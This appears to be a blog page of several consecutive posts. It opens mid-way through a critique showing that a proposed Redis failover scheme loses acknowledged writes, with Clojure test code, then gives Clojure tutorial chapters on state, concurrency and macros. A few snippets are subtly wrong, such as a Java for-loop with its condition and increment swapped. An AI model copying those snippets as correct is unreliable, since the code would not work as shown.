It gets worse. Even if we did have a perfect mutex around the coordinator, two coordinators could issue messages to the same Redis nodes which arrive out of order. TCP does not guarantee ordering between two distinct TCP streams, which means we might see coordinator A initiate a failover process then time out halfway; followed by coordinator B which begins the failover process, only to be interrupted on some nodes by messages en-route through the network from coordinator A. Don’t believe me? TCP message delays have been reported in excess of ninety seconds. That one took out Github.

It gets even worse. If the original primary P1 is isolated from the coordinator, the coordinator will not be able to force P1 to step down. Indeed, P1 could remain a primary for the entire duration of a failover, accepting writes, making state changes, and attempting to replicate those changes to other nodes. This is dangerous because we cannot atomically guarantee that the new majority of nodes will reject those writes.

  1. A client writes to P1, which replicates to secondaries S2, S3, S4, and S5.
  2. The coordinator attempts to elect a new primary, and sees S2, S3, S4, and S5.
  3. Without loss of generality, assume S2 has the highest replication offset. The coordinator promotes S2 to P2.
  4. P1 receives acks from S3, S4, and S5, and, having reached a majority, returns success to the client.
  5. The coordinator reparents S3, S4, and S5 to P2, destroying the write.

You might try to solve this by forcing S2–S5 into a read-only, non-replicating mode before attempting to promote a new primary, but that gets into a whole other morass of issues around multiple state transitions and partial failures. Suffice it to say: it’s difficult to solve this by simply pausing nodes first. Maybe impossible? I’m not sure.

Typically, replication protocols solve this problem by guaranteeing that writes from S1 can not be accepted after S2–S5 acknowledge to the coordinator that they will participate in a new cohort. This often takes the form of a ballot (Paxos), epoch (ZAB, Viewstamped Replication), or term (RAFT). Redis has no such construct, and antirez seems to eschew it as unnecessary:

In this model, it is possible to reach linearizability? I believe, yes, because we removed all the hard part, for which the strong protocols like Raft use epochs.

This brings us to a different, but related series of problems.

The servers

By using the offset in the replication log as the determining factor in which nodes are promotable, the proposed failover design opens the door for significant data loss.

Imagine the following sequence:

  1. The primary P1, with log offset O1, becomes isolated from S3, S4, and S5.
  2. Clients writing to P1 see their operations using WAIT 2 fail.
  3. S3 is promoted to P3, with offset O1=O3. Clients writing to P3 see their writes succeed, replicated to S4 and S5.
  4. More operations occur on P1 than on P3. O1 becomes greater than O3.
  5. The partition heals; the coordinator can see both P1 and P3.
  6. The coordinator sees that O1 is higher than O3, and chooses P1 as the new primary.
  7. P3 is demoted, and all its acknowledged writes are destroyed.

Don’t believe me? Here, let’s try it. Here’s a function which implements (more or less) the proposed coordinator algorithm. Note that we’re not demoting the original primary because it may not be reachable.

(defn elect! "Forces an election among the given nodes. Picks the node with the highest replication offset, promotes it, and re-parents the secondaries." [nodes] (let [highest (highest-node nodes)] (log "Promoting" highest) (with-node highest (redis/slaveof "no" "one")) (doseq [node (remove #{highest} nodes)] (log "Reparenting" node "to" highest) (with-node node (redis/slaveof highest 6379)))))

And in the test, we’ll use WAIT to ensure that only writes which are successfully replicated to 2 or more replicas are considered successful:

(add [app element] (try (redis/with-conn pool spec (redis/sadd key element)) ; Block for 2 secondaries (3 total) to ack. (let [acks (redis/with-conn pool spec (taoensso.carmine.protocol/send-request! "WAIT" 2 1000))] (if (< acks 2) (do (log "not enough copies: " acks) error) ok)) (catch Exception e (if (->> e .getMessage (re-find #"^READONLY")) error (throw e))))

I’m gonna punt on informing clients which node is the current primary; we’ll just issue set-add requests to each node independently. Jepsen only cares about whether successful writes are lost, so we’ll let those writes fail and log ‘em as unsuccessful.

Initially, the offset for all 5 nodes is 15. Writes complete successfully on P1 and fail on S2–S5.

healthy.png

We cut off P1 and S2 from S3, S4, and S5. S3, S4, and S5 all have equal offsets (1570), so we promote S3 to P3. As soon as the partition takes effect, writes to P1 begin to fail–we see not enough copies: 1, and an :error status for write 110, 115, and so on. Latencies on P1 jump to 1 second, since that’s how long we’re blocking for using WAIT.

failover1.png

Writes complete successfully on P3, since it can see a majority of nodes: itself, S4, and S5. We heal the partition and initiate a second election. Since P1’s offset (8010) is higher than P3’s (6487), we preserve P1 as a primary and demote all other nodes to follow it. All P3’s writes accepted during the partition are silently destroyed.

failover2.png

Note that there’s actually a window here where writes can successfully take place on either of P1 or P2 in a mixed sequence, depending on the order in which the secondaries are reparented. Both 560 and 562 complete successfully, even though 562 was written to S3, which was demoted at that point in time. Some weird opportunity for timing anomalies there.

results.png

These results are catastrophic. In a partition which lasted for roughly 45% of the test, 45% of acknowledged writes were thrown away. To add insult to injury, Redis preserved all the failed writes in place of the successful ones.

Additional issues

Two bugs amplify this problem. Note that this is the unstable branch, so this isn’t a huge deal right now:

First, Redis secondaries return -1 for their offset when they detect the primary is down. Returning a special status code makes sense… but not if you’re using the offset to determine which nodes become the primary. This could cause the highest nodes to appear the lowest, and vice versa. If a fresh node has offset 0, and all other nodes return offset -1, this could cause a cluster to erase all data ever written to it.

Second, Redis resets the replication offset to zero every time a node is promoted. Again, a reasonable choice in isolation, but it actually maximizes the chances that this particular failure mode will occur. The current design is biased towards data loss.

Even if these bugs were corrected, the problem could still occur. All that’s required is for more operations to happen on P1 than P3 after the two diverge.

Going forward

Distributed systems design is really hard, but engineers continue to assume otherwise:

However I think that distributed systems are not super hard, like kernel programming is not super hard, like C system programming is not super hard. Everything new or that you don’t do in a daily basis seems super hard, but it is actually different concepts that are definitely things everybody here in this list can master.

For sure a few months of exposure will not make you able to provide work like Raft or Paxos, but the basics can be used in order to try to design practical systems, that can be improved over time.

I assert just the opposite: we need formal theory, written proofs, computer verification, and experimental demonstration that our systems make the tradeoffs we think they make. Throughout the Redis criticism thread and discussion on Twitter, I see engineers assuming that they understand the tradeoffs despite the presence of gaping holes in the system’s safety net.

This behavior endangers users.

These list threads and blog posts are the sources that users come to, years later, to understand the safety properties of our systems. They’ll read our conjectures and idle thoughts and tease out some gestalt, and use that to build their systems on top of ours. They’ll miss subtle differences in phrasing and they won’t read every reply. Most won’t do any reading at all; they’re not even aware that these problems could exist.

Engineers routinely characterize Redis’s reliability as “rock solid”.

This is part of why I engage in these discussions so vocally. As systems engineers, we continually struggle to erase the assumption of safety before that assumption causes data loss or downtime. We need to clearly document system behaviors so that users can make the right choices.

We must understand our systems in order to explain them–and distributed systems are hard to understand. That’s why it’s so important that we rely on formal models, on proofs, instead of inventing our own consensus protocols–because much of the hard work of understanding has been done already. We can build on that work. Implementing a peer-reviewed paper is vastly simpler than trying to design and verify an algorithm from scratch–or worse, evolving one piecemeal, comprised of systems which encode subtly different assumptions about their responsibilities to the world. Those designs lead to small gaps which, viewed from the right angle, become big enough to drive a truck through.

I wholeheartedly encourage antirez, myself, and every other distributed systems engineer: keep writing code, building features, solving problems–but please, please, use existing algorithms, or learn how to write a proof.

Previously: Macros.

Most programs encompass change. People grow up, leave town, fall in love, and take new names. Engines burn through fuel while their parts wear out, and new ones are swapped in. Forests burn down and their logs become nurseries for new trees. Despite these changes, we say “She’s still Nguyen”, “That’s my motorcycle”, “The same woods I hiked through as a child.”

Identity is a skein we lay across the world of immutable facts; a single entity which encompasses change. In programming, identities unify different values over time. Identity types are mutable references to immutable values.

In this chapter, we’ll move from immutable references to complex concurrent transactions. In the process we’ll get a taste of concurrency and parallelism, which will motivate the use of more sophisticated identity types. These are not easy concepts, so don’t get discouraged. You don’t have to understand this chapter fully to be a productive programmer, but I do want to hint at why things work this way. As you work with state more, these concepts will solidify.

Immutability

The references we’ve used in let bindings and function arguments are immutable: they never change.

user=> (let [x 1] (prn (inc x)) (prn (inc x))) 2 2

The expression (inc x) did not alter x: x remained 1. The same applies to strings, lists, vectors, maps, sets, and most everything else in Clojure:

user=> (let [x [1 2]] (prn (conj x :a)) (prn (conj x :b))) [1 2 :a] [1 2 :b]

Immutability also extends to let bindings, function arguments, and other symbols. Functions remember the values of those symbols at the time the function was constructed.

(defn present [gift] (fn [] gift)) user=> (def green-box (present "clockwork beetle")) #'user/green-box user=> (def red-box (present "plush tiger")) #'user/red-box user=> (red-box) "plush tiger" user=> (green-box) "clockwork beetle"

The present function creates a new function. That function takes no arguments, and always returns the gift. Which gift? Because gift is not an argument to the inner function, it refers to the value from the outer function body. When we packaged up the red and green boxes, the functions we created carried with them a memory of the gift symbol’s value.

This is called closing over the gift variable; the inner function is sometimes called a closure. In Clojure, new functions close over all variables except their arguments–the arguments, of course, will be provided when the function is invoked.

Delays

Because functions close over their arguments, they can be used to defer evaluation of expressions. That’s how we introduced functions originally–like let expressions, but with a number (maybe zero!) of symbols missing, to be filled in at a later time.

user=> (do (prn "Adding") (+ 1 2)) "Adding" 3 user=> (def later (fn [] (prn "Adding") (+ 1 2))) #'user/later user=> (later) "Adding" 3

Evaluating (def later ...) did not evaluate the expressions in the function body. Only when we invoked the function later did Clojure print "Adding" to the screen, and return 3. This is the basis of concurrency: evaluating expressions outside their normal, sequential order.

This pattern of deferring evaluation is so common that there’s a standard macro for it, called delay:

user=> (def later (delay (prn "Adding") (+ 1 2))) #'user/later user=> later #<Delay@2dd31aac: :pending> user=> (deref later) "Adding" 3

Instead of a function, delay creates a special type of Delay object: an identity which refers to expressions which should be evaluated later. We extract, or dereference, the value of that identity with deref. Delays follow the same rules as functions, closing over lexical scope–because delay actually macroexpands into an anonymous function.

user=> (source delay) (defmacro delay "Takes a body of expressions and yields a Delay object that will invoke the body only the first time it is forced (with force or deref/@), and will cache the result and return it on all subsequent force calls. See also - realized?" {:added "1.0"} [& body] (list 'new 'clojure.lang.Delay (list* `^{:once true} fn* [] body)))

Why the Delay object instead of a plain old function? Because unlike function invocation, delays only evaluate their expressions once. They remember their value, after the first evaluation, and return it for every successive deref.

user=> (deref later) 3 user=> (deref later) 3

By the way, there’s a shortcut for (deref something): the wormhole operator @:

user=> @later ; Interpreted as (deref later) 3

Remember how map returned a sequence immediately, but didn’t actually perform any computation until we asked for elements? That’s called lazy evaluation. Because delays are lazy, we can avoid doing expensive operations until they’re really needed. Like an IOU, we use delays when we aren’t ready to do something just yet, but when someone calls in the favor, we’ll make sure it happens.

Futures

What if we wanted to opportunistically defer computation? Modern computers have multiple cores, and operating systems let us share a core between two tasks. It would be great if we could use that multitasking ability to say, “I don’t need the result of evaluating these expressions yet, but I’d like it later. Could you start working on it in the meantime?”

Enter the future: a delay which is evaluated in parallel. Like delays, futures return immediately, and give us an identity which will point to the value of the last expression in the future–in this case, the value of (+ 1 2).

user=> (def x (future (prn "hi") (+ 1 2))) "hi" #'user/x user=> (deref x) 3

Notice how the future printed “hi” right away. That’s because futures are evaluated in a new thread. On multicore computers, two threads can run in parallel, on different cores the same time. When there are more threads than cores, the cores trade off running different threads. Both parallel and non-parallel evaluation of threads are concurrent because expressions from different threads can be evaluated out of order.

user=> (dotimes [i 5] (future (prn i))) 14 3 0 2 nil

Five threads running at once. Notice that the thread printing 1 didn’t even get to move to a new line before 4 showed up–then both threads wrote new lines at the same time. There are techniques to control this concurrent execution so that things happen in some well-defined sequence, like agents and locks, but we’ll discuss those later.

Just like delays, we can deref a future as many times as we want, and the expressions are only evaluated once.

user=> (def x (future (prn "hi") (+ 1 2))) #'user/x"hi" user=> @x 3 user=> @x 3

Futures are the most generic parallel construct in Clojure. You can use futures to do CPU-intensive computation faster, to wait for multiple network requests to complete at once, or to run housekeeping code periodically.

Promises

Delays defer evaluation, and futures parallelize it. What if we wanted to defer something we don’t even have yet? To hand someone an empty box and, later, before they open it, sneak in and replacing its contents with an actual gift? Surely I’m not the only one who does birthday presents this way.

user=> (def box (promise)) #'user/box user=> box #<core$promise$reify__6310@1d7762e: :pending>

This box is pending a value. Like futures and delays, if we try to open it, we’ll get stuck and have to wait for something to appear inside:

user=> (deref box)

But unlike futures and delays, this box won’t be filled automatically. Hold the Control key and hit c to give up on trying to open that package. Nobody else is in this REPL, so we’ll have to buy our own presents.

user=> (deliver box :live-scorpions!) #<core$promise$reify__6310@1d7762e: :live-scorpions!> user=> (deref box) :live-scorpions!

Wow, that’s a terrible gift. But at least there’s something there: when we dereference the box, it opens immediately and live scorpions skitter out. Can we get a do-over? Let’s try a nicer gift.

user=> (deliver box :puppy) nil user=> (deref box) :live-scorpions!

Like delays and futures, there’s no going back on our promises. Once delivered, a promise always refers to the same value. This is a simple identity type: we can set it to a value once, and read it as many times as we want. promise is also a concurrency primitive: it guarantees that any attempt to read the value will wait until the value has been written. We can use promises to synchronize a program which is being evaluated concurrently–for instance, this simple card game:

user=> (def card (promise)) #'user/card user=> (def dealer (future (Thread/sleep 5000) (deliver card [(inc (rand-int 13)) (rand-nth [:clubs :spades :hearts :diamonds])]))) #'user/dealer user=> (deref card) [5 :diamonds]

In this program, we set up a dealer thread which waits for five seconds (5000 milliseconds), then delivers a random card. While the dealer is sleeping, we try to deref our card–and have to wait until the five seconds are up. Synchronization and identity in one package.

Where delays are lazy, and futures are parallel, promises are concurrent without specifying how the evaluation occurs. We control exactly when and how the value is delivered. You can think of both delays and futures as being built atop promises, in a way.

Vars

So far the identities we’ve discussed have referred (eventually) to a single value, but the real world needs names that refer to different values at different points in time. For this, we use vars.

We’ve touched on vars before–they’re transparent mutable references. Each var has a value associated with it, and that value can change over time. When a var is evaluated, it is replaced by its present value transparently–everywhere in the program.

user=> (def x :mouse) #'user/x user=> (def box (fn [] x)) #'user/box user=> (box) :mouse user=> (def x :cat) #'user/x user=> (box) :cat

The box function closed over x–but calling (box) returned different results depending on the current value of x. Even though the var x remained unchanged throughout this example, the value associated with that var did change!

Using mutable vars allows us to write programs which we can redefine as we go along.

user=> (defn decouple [glider] #_=> (prn "bolts released")) #'user/decouple user=> (defn launch [glider] #_=> (decouple glider) #_=> (prn glider "away!")) #'user/launch user=> (launch "albatross") "bolts released" "albatross" "away!" nil user=> (defn decouple [glider] #_=> (prn "tether released")) #'user/decouple user=> (launch "albatross") "tether released" "albatross" "away!"

A reference which is the same everywhere is called a global variable, or simply a global. But vars have an additional trick up their sleeve: with a dynamic var, we can override their value only within the scope of a particular function call, and nowhere else.

user=> (def ^:dynamic *board* :maple) #'user/*board*

^:dynamic tells Clojure that this var can be overridden in one particular scope. By convention, dynamic variables are named with asterisks around them–this reminds us, as programmers, that they are likely to change. Next, we define a function that uses that dynamic var:

user=> (defn cut [] (prn "sawing through" *board*)) #'user/cut

Note that cut closes over the var *board*, but not the value :maple. Every time the function is invoked, it looks up the current value of *board*.

user=> (cut) "sawing through" :maple nil user=> (binding [*board* :cedar] (cut)) "sawing through" :cedar nil user=> (cut) "sawing through" :maple

Like let, the binding macro assigns a value to a name–but where fn and let create immutable lexical scope, binding creates dynamic scope. The difference? Lexical scope is constrained to the literal text of the fn or let expression–but dynamic scope propagates through function calls.

Within the binding expression, and in every function called from that expression, and every function called from those functions, and so on, *board* has the value :cedar. Outside the binding expression, the value is still :maple. This safety property holds even when the program is executed in multiple threads: only the thread which evaluated the binding expression uses that value. Other threads are unaffected.

While we use def all the time in the REPL, in real programs you should only mutate vars sparingly. They’re intended for naming functions, important bits of global data, and for tracking the environment of a program–like where to print messages with prn, which database to talk to, and so on. Using vars for mutable program state is a recipe for disaster, as we’re about to see.

Atoms

Vars can be read, set, and dynamically bound–but they aren’t easy to evolve. Imagine building up a set of integers:

user=> (def xs #{}) #'user/xs user=> (dotimes [i 10] (def xs (conj xs i))) user=> xs #{0 1 2 3 4 5 6 7 8 9}

For each number from 0 to 9, we take the current set of numbers xs, add a particular number i to that set, and redefine xs as the result. This is a common idiom in imperative language like C, Ruby, Javascript, or Java–all variables are mutable by default.

ImmutableSet xs = new ImmutableSet(); for (int i = 0; i++; i < 10) { xs = xs.add(i); }

It seems straightforward enough, but there are serious problems lurking here. Specifically, this program is not thread safe.

user=> (def xs #{}) user=> (dotimes [i 10] (future (def xs (conj xs i)))) #'user/xs nil user=> xs #{1 4 5 7}

This program runs 10 threads in parallel, and each reads the current value of xs, adds its particular number, and defines xs to be that new set of numbers. This read-modify-update process assumed that all updates would be consecutive–not concurrent. When we allowed the program to do two read-modify-updates at the same time, updates were lost.

  1. Thread 2 read #{0 1}
  2. Thread 3 read #{0 1}
  3. Thread 2 wrote #{0 1 2}
  4. Thread 3 wrote #{0 1 3}

This interleaving of operations allowed the number 2 to slip through the cracks. We need something stronger–an identity which supports safe transformation from one state to another. Enter *atoms.

user=> (def xs (atom #{})) #'user/xs user=> xs #<Atom@30bb8cc9: #{}>

The initial value of this atom is #{}. Unlike vars, atoms are not transparent. When evaluated, they don’t return their underlying values–but notice that when printed, the current value is hiding inside. To get the current value out of an atom, we have to use deref or @.

user=> (deref xs) #{} user=> @xs #{}

Like vars, atoms can be set to a particular value–but instead of def, we use reset!. The exclamation point (sometimes called a bang) is there to remind us that this function modifies the state of its arguments–in this case, changing the value of the atom.

user=> (reset! xs :foo) :foo user=> xs #<Atom@30bb8cc9: :foo>

Unlike vars, atoms can be safely updated using swap!. swap! uses a pure function which takes the current value of the atom and returns a new value. Under the hood, Clojure does some tricks to ensure that these updates are linearizable, which means:

  1. All updates with `swap! complete in what appears to be a single consecutive order.
  2. The effect of a swap! never takes place before calling swap!.
  3. The effect of a swap! is visible to everyone once swap! returns.
user=> (def x (atom 0)) #'user/x user=> (swap! x inc) 1 user=> (swap! x inc) 2

The first swap! reads the value 0, calls (inc 0) to obtain 1, and writes 1 back to the atom. Each call to swap! returns the value that was just written.

We can pass additional arguments to the function swap! calls. For instance, (swap! x + 5 6) will call (+ x 5 6) to find the new value. Now we have the tools to correct our parallel program from earlier:

user=> (def xs (atom #{})) #'user/xs user=> (dotimes [i 10] (future (swap! xs conj i))) nil user=> @xs #{0 1 2 3 4 5 6 7 8 9}

Note that the function we use to update an atom must be pure–must not mutate any state–because when resolving conflicts between multiple threads, Clojure might need to call the update function more than once. Clojure’s reliance on immutable datatypes, immutable variables, and pure functions enables this approach to linearizable mutability. Languages which emphasize mutable datatypes need to use other constructs.

Atoms are the workhorse of Clojure state. They’re lightweight, safe, fast, and flexible. You can use atoms with any immutable datatype–for instance, a map to track complex state. Reach for an atom whenever you want to update a single thing over time.

Refs

Atoms are a great way to represent state, but they are only linearizable individually. Updates to an atom aren’t well-ordered with respect to other atoms, so if we try to update more than one atom at once, we could see the same kinds of bugs that we did with vars.

For multi-identity updates, we need a stronger safety property than single-atom linearizability. We want serializability: a global order. For this, Clojure has an identity type called a Ref.

user=> (def x (ref 0)) #'user/x user=> x #<Ref@1835d850: 0>

Like all identity types, refs are dereferencable:

user=> @x 0

But where atoms are updated individually with swap!, refs are updated in groups using dosync transactions. Just as we reset! an atom, we can set refs to new values using ref-set–but unlike atoms, we can change more than one ref at once.

user=> (def x (ref 0)) user=> (def y (ref 0)) user=> (dosync (ref-set x 1) (ref-set y 2)) 2 user=> [@x @y] [1 2]

The equivalent of swap!, for a ref, is alter:

user=> (def x (ref 1)) user=> (def y (ref 2)) user=> (dosync (alter x + 2) (alter y inc)) 3 user=> [@x @y] [3 3]

All alter operations within a dosync take place atomically–their effects are never interleaved with other transactions. If it’s OK for an operation to take place out of order, you can use commute instead of alter for a performance boost:

user=> (dosync (commute x + 2) (commute y inc))

These updates are not guaranteed to take place in the same order–but if all our transactions are equivalent, we can relax the ordering constraints. x + 2 + 3 is equal to x + 3 + 2, so we can do the additions in either order. That’s what commutative means: the same result from all orders. It’s a weaker, but faster kind of safety property.

Finally, if you want to read a value from one ref and use it to update another, use ensure instead of deref to perform a strongly consistent read–one which is guaranteed to take place in the same logical order as the dosync transaction itself. To add y’s current value to x, use:

user=> (dosync (alter x + (ensure y)))

Refs are a powerful construct, and make it easier to write complex transactional logic safely. However, that safety comes at a cost: refs are typically an order of magnitude slower to update than atoms.

Use refs only where you need to update multiple pieces of state independently–specifically, where different transactions need to work with distinct but partly overlapping pieces of state. If there’s no overlap between updates, use distinct atoms. If all operations update the same identities, use a single atom to hold a map of the system’s state. If a system requires complex interlocking state spread throughput the program–that’s when to reach for refs.

Summary

We moved beyond immutable programs into the world of changing state–and discovered the challenges of concurrency and parallelism. Where symbols provide immutable and transparent names for values objects, Vars provide mutable transparent names. We also saw a host of anonymous identity types for different purposes: delays for lazy evaluation, futures for parallel evaluation, and promises for arbitrary handoff of a value. Updates to vars are unsafe, so atoms and refs provide linearizable and serializable identities where transformations are safe.

Where reading a symbol or var is transparent–they evaluate directly to their current values–reading these new identity types requires the use of deref. Delays, futures, and promises block: deref must wait until the value is ready. This allows synchronization of concurrent threads. Atoms and refs, by contrast, can be read immediately at any time–but updating their values should occur within a swap! or dosync transaction, respectively.

Type Mutability Reads Updates Evaluation Scope
Symbol Immutable Transparent Lexical
Var Mutable Transparent Unrestricted Global/Dynamic
Delay Mutable Blocking Once only Lazy
Future Mutable Blocking Once only Parallel
Promise Mutable Blocking Once only
Atom Mutable Nonblocking Linearizable
Ref Mutable Nonblocking Serializable

State is undoubtedly the hardest part of programming, and this chapter probably felt overwhelming! On the other hand, we’re now equipped to solve serious problems. We’ll take a break to apply what we’ve learned through practical examples, in Chapter Seven: Logistics.

Exercises

Finding the sum of the first 10000000 numbers takes about 1 second on my machine:

user=> (defn sum [start end] (reduce + (range start end))) user=> (time (sum 0 1e7)) "Elapsed time: 1001.295323 msecs" 49999995000000
  1. Use delay to compute this sum lazily; show that it takes no time to return the delay, but roughly 1 second to deref.

  2. We can do the computation in a new thread directly, using (.start (Thread. (fn [] (sum 0 1e7)))–but this simply runs the (sum) function and discards the results. Use a promise to hand the result back out of the thread. Use this technique to write your own version of the future macro.

  3. If your computer has two cores, you can do this expensive computation twice as fast by splitting it into two parts: (sum 0 (/ 1e7 2)), and (sum (/ 1e7 2) 1e7), then adding those parts together. Use future to do both parts at once, and show that this strategy gets the same answer as the single-threaded version, but takes roughly half the time.

  4. Instead of using reduce, store the sum in an atom and use two futures to add each number from the lower and upper range to that atom. Wait for both futures to complete using deref, then check that the atom contains the right number. Is this technique faster or slower than reduce? Why do you think that might be?

  5. Instead of using a lazy list, imagine two threads are removing tasks from a pile of work. Our work pile will be the list of all integers from 0 to 10000:

    user=> (def work (ref (apply list (range 1e5)))) user=> (take 10 @work) (0 1 2 3 4 5 6 7 8 9)

    And the sum will be a ref as well:

    user=> (def sum (ref 0))

    Write a function which, in a dosync transaction, removes the first number in work and adds it to sum.
    Then, in two futures, call that function over and over again until there’s no work left. Verify that @sum is 4999950000. Experiment with different combinations of alter and commute–if both are correct, is one faster? Does using deref instead of ensure change the result?

In Chapter 1, I asserted that the grammar of Lisp is uniform: every expression is a list, beginning with a verb, and followed by some arguments. Evaluation proceeds from left to right, and every element of the list must be evaluated before evaluating the list itself. Yet we just saw, at the end of Sequences, an expression which seemed to violate these rules.

Clearly, this is not the whole story.

Macroexpansion

There is another phase to evaluating an expression; one which takes place before the rules we’ve followed so far. That process is called macro-expansion. During macro-expansion, the code itself is restructured according to some set of rules–rules which you, the programmer, can define.

(defmacro ignore "Cancels the evaluation of an expression, returning nil instead." [expr] nil) user=> (ignore (+ 1 2)) nil

defmacro looks a lot like defn: it has a name, an optional documentation string, an argument vector, and a body–in this case, just nil. In this case, it looks like it simply ignored the expr (+ 1 2) and returned nil–but it’s actually deeper than that. (+ 1 2) was never evaluated at all.

user=> (def x 1) #'user/x user=> x 1 user=> (ignore (def x 2)) nil user=> x 1

def should have defined x to be 2 no matter what–but that never happened. At macroexpansion time, the expression (ignore (+ 1 2)) was replaced by the expression nil, which was then evaluated to nil. Where functions rewrite values, macros rewrite code.

To see these different layers in play, let’s try a macro which reverses the order of arguments to a function.

(defmacro rev [fun & args] (cons fun (reverse args)))

This macro, named rev, takes one mandatory argument: a function. Then it takes any number of arguments, which are collected in the list args. It constructs a new list, starting with the function, and followed by the arguments, in reverse order.

First, we macro-expand:

user=> (macroexpand '(rev str "hi" (+ 1 2))) (str (+ 1 2) "hi")

So the rev macro took str as the function, and "hi" and (+ 1 2) as the arguments; then constructed a new list with the same function, but the arguments reversed. When we evaluate that expression, we get:

user=> (eval (macroexpand '(rev str "hi" (+ 1 2)))) "3hi"

macroexpand takes an expression and returns that expression with all macros expanded. eval takes an expression and evaluates it. When you type an unquoted expression into the REPL, Clojure macroexpands, then evaluates. Two stages–the first transforming code, the second transforming values.

Across languages

Some languages have a metalanguage: a language for extending the language itself. In C, for example, macros are implemented by the C preprocessor, which has its own syntax for defining expressions, matching patterns in the source code’s text, and replacing that text with other text. But that preprocessor is not C–it is a separate language entirely, with special limitations. In Clojure, the metalanguage is Clojure itself–the full power of the language is available to restructure programs. This is called a procedural macro system. Some Lisps, like Scheme, use a macro system based on templating expressions, and still others use more powerful models like f-expressions–but that’s a discussion for a later time.

There is another key difference between Lisp macros and many other macro systems: in Lisp, the macros operate on expressions: the data structure of the code itself. Because Lisp code is written explicitly as a data structure, a tree made out of lists, this transformation is natural. You can see the structure of the code, which makes it easy to reason about its transformation. In the C preprocessor, macros operate only on text: there is no understanding of the underlying syntax. Even in languages like Scala which have syntactic macros, the fact that the code looks nothing like the syntax tree makes it cumbersome to truly restructure expressions.

When people say that Lisp’s syntax is “more elegant”, or “more beautiful”, or “simpler”, this is part of what they they mean. By choosing to represent the program directly as a a data structure, we make it much easier to define complex transformations of code itself.

Defining new syntax

What kind of transformations are best expressed with macros?

Most languages encode special syntactic forms–things like “define a function”, “call a function”, “define a local variable”, “if this, then that”, and so on. In Clojure, these are called special forms. if is a special form, for instance. Its definition is built into the language core itself; it cannot be reduced into smaller parts.

(if (< 3 x) "big" "small")

Or in Javascript:

if (3 < x) { return "big"; } else { return "small"; }

In Javascript, Ruby, and many other languages, these special forms are fixed. You cannot define your own syntax. For instance, one cannot define or in a language like JS or Ruby: it must be defined for you by the language author.

In Clojure, or is just a macro.

user=> (source or) (defmacro or "Evaluates exprs one at a time, from left to right. If a form returns a logical true value, or returns that value and doesn't evaluate any of the other expressions, otherwise it returns the value of the last expression. (or) returns nil." {:added "1.0"} ([] nil) ([x] x) ([x & next] `(let [or# ~x] (if or# or# (or ~@next))))) nil

That ` operator–that’s called syntax-quote. It works just like regular quote–preventing evaluation of the following list–but with a twist: we can escape the quoting rule and substitute in regularly evaluated expressions using unquote (~), and unquote-splice (~@). Think of a syntax-quoted expression like a template for code, with some parts filled in by evaluated forms.

user=> (let [x 2] `(inc x)) (clojure.core/inc user/x) user=> (let [x 2] `(inc ~x)) (clojure.core/inc 2)

See the difference? ~x substitutes the value of x, instead of using x as an unevaluated symbol. This code is essentially just shorthand for something like

user=> (let [x 2] (list 'clojure.core/inc x)) (inc 2)

… where we explicitly constructed a new list with the quoted symbol 'inc and the current value of x. Syntax quote just makes it easier to read the code, since the quoted and expanded expressions have similar shapes.

The ~@ unquote splice works just like ~, except it explodes a list into multiple expressions in the resulting form:

user=> `(foo ~[1 2 3]) (user/foo [1 2 3]) user=> `(foo ~@[1 2 3]) (user/foo 1 2 3)

~@ is particularly useful when a function or macro takes an arbitrary number of arguments. In the definition of or, it’s used to expand (or a b c) recursively.

user=> (pprint (macroexpand '(or a b c d))) (let* [or__3943__auto__ a] (if or__3943__auto__ or__3943__auto__ (clojure.core/or b c d)))

We’re using pprint (for “pretty print”) to make this expression easier to read. (or a b c d) is defined in terms of if: if the first element is truthy we return it; otherwise we evaluate (or b c d) instead, and so on.

The final piece of the puzzle here is that weirdly named symbol: or__3943__auto__. That variable was automatically generated by Clojure, to prevent conflicts with an existing variable name. Because macros rewrite code, they have to be careful not to interfere with local variables, or it could get very confusing. Whenever we need a new variable in a macro, we use gensym to generate a new symbol.

user=> (gensym "hi") hi326 user=> (gensym "hi") hi329 user=> (gensym "hi") hi332

Each symbol is different! If we tack on a # to the end of a symbol in a syntax-quoted expression, it’ll be expanded to a particular gensym:

user=> `(let [x# 2] x#) (clojure.core/let [x__339__auto__ 2] x__339__auto__)

Note that you can always escape this safety feature if you want to override local variables. That’s called symbol capture, or an anaphoric or unhygenic macro. To override local symbols, just use ~'foo instead of foo#.

With all the pieces on the board, let’s compare the or macro and its expansion:

(defmacro or "Evaluates exprs one at a time, from left to right. If a form returns a logical true value, or returns that value and doesn't evaluate any of the other expressions, otherwise it returns the value of the last expression. (or) returns nil." {:added "1.0"} ([] nil) ([x] x) ([x & next] `(let [or# ~x] (if or# or# (or ~@next))))) user=> (pprint (clojure.walk/macroexpand-all '(or (mossy? stone) (cool? stone) (wet? stone)))) (let* [or__3943__auto__ (mossy? stone)] (if or__3943__auto__ or__3943__auto__ (let* [or__3943__auto__ (cool? stone)] (if or__3943__auto__ or__3943__auto__ (wet? stone)))))

See how the macro’s syntax-quoted (let ... has the same shape as the resulting code? or# is expanded to a variable named or__3943__auto__, which is bound to the expression (mossy? stone). If that variable is truthy, we return it. Otherwise, we (and here’s the recursive part) rebind or__3943__auto__ to (cool? stone) and try again. If that fails, we fall back to evaluating (wet? stone)–thanks to the base case, the single-argument form of the or macro.

Control flow

We’ve seen that or is a macro written in terms of the special form if–and because of the way the macro is structured, it does not obey the normal execution order. In (or a b c), only a is evaluated first–then, only if it is false or nil, do we evaluate b. This is called short-circuiting, and it works for and as well.

Changing the order of evaluation in a language is called control flow, and lets programs make decisions based on varying circumstances. We’ve already seen if:

user=> (if (= 2 2) :a :b) :a

if takes a predicate and two expressions, and only evaluates one of them, depending on whether the predicate evaluates to a truthy or falsey value. Sometimes you want to evaluate more than one expression in order. For this, we have do.

user=> (if (pos? -5) (prn "-5 is positive") (do (prn "-5 is negative") (prn "Who would have thought?"))) "-5 is negative" "Who would have thought?" nil

prn is a function which has a side effect: it prints a message to the screen, and returns nil. We wanted to print two messages, but if only takes a single expression per branch–so in our false branch, we used do to wrap up two prns into a single expression, and evaluate them in order. do returns the value of the final expression, which happens to be nil here.

When you only want to take one branch of an if, you can use when:

user=> (when false (prn :hi) (prn :there)) nil user=> (when true (prn :hi) (prn :there)) :hi :there nil

Because there is only one path to take, when takes any number of expressions, and evaluates them only when the predicate is truthy. If the predicate evaluates to nil or false, when does not evaluate its body, and returns nil.

Both when and if have complementary forms, when-not and if-not, which simply invert the sense of their predicate.

user=> (when-not (number? "a string") :here) :here user=> (if-not (vector? (list 1 2 3)) :a :b) :a

